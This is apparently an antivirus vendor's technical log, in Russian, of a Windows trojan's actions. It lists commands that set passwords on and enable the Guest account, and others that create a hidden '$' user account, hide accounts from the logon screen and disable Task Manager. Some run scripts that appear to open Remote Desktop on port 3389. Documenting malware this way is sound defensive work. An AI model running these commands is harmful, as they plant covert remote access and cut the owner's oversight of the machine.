Техническая информация
- Диспетчера задач (Taskmgr)
- '%WINDIR%\qd.exe'
- '<SYSTEM32>\gpupdate.exe'
- '<SYSTEM32>\net1.exe' user Guest yu19815109709
- '<SYSTEM32>\net1.exe' user Guest /active:yes
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\reg.exe' add hkcu\software\microsoft\windows\currentversion\policies\system /v DisableTaskMgr /t reg_dword /d 1 /f
- '<SYSTEM32>\net1.exe' user Adminisarator yu19815109709
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s Guest /add
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %USERNAME% /t reg_dword /d 00000001 /f
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\open3389.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\admin.bat" "
- '<SYSTEM32>\wscript.exe' "%WINDIR%\1.vbs"
- '<SYSTEM32>\net1.exe' user %USERNAME%$ yu19815109709 /add
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %USERNAME%$ /t reg_dword /d 00000000 /f
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s %USERNAME%$ /add
- '%WINDIR%\regedit.exe' /s 3389.reg
- %WINDIR%\open3389.bat
- %WINDIR%\3389.reg
- %WINDIR%\qd.exe
- %WINDIR%\admin.bat
- %WINDIR%\1.vbs
- %WINDIR%\3389.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''